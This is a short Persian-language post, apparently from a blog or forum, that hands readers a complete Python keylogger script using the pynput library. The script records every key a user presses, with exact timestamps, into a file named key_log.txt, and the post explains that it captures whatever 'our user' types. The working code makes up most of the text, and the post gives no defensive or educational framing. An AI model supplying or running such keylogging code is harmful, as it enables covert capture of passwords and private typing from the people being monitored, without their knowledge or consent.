سلام امروز می خوام بهتون تکه کدی بدم که می تونه کلید هایی که در زده میشن رو لاگ کنه 

اسکریپت

import logging
import time
from pynput.keyboard import Listener

log_dir = ""
logging.basicConfig(filename=(log_dir + 'key_log.txt'), level=logging.DEBUG,
format='%(asctime)s: %(message)s')
def on_press(key):
         logging.info(str(key))
with Listener(on_press=on_press) as listener:
         listener.join()

کد چک می کنه که ببینه اگر کاربر ما هر دکمه ای رو بزنه اونرو با زمان دقیقش توی فایل key_log.txt ذخیره می کنه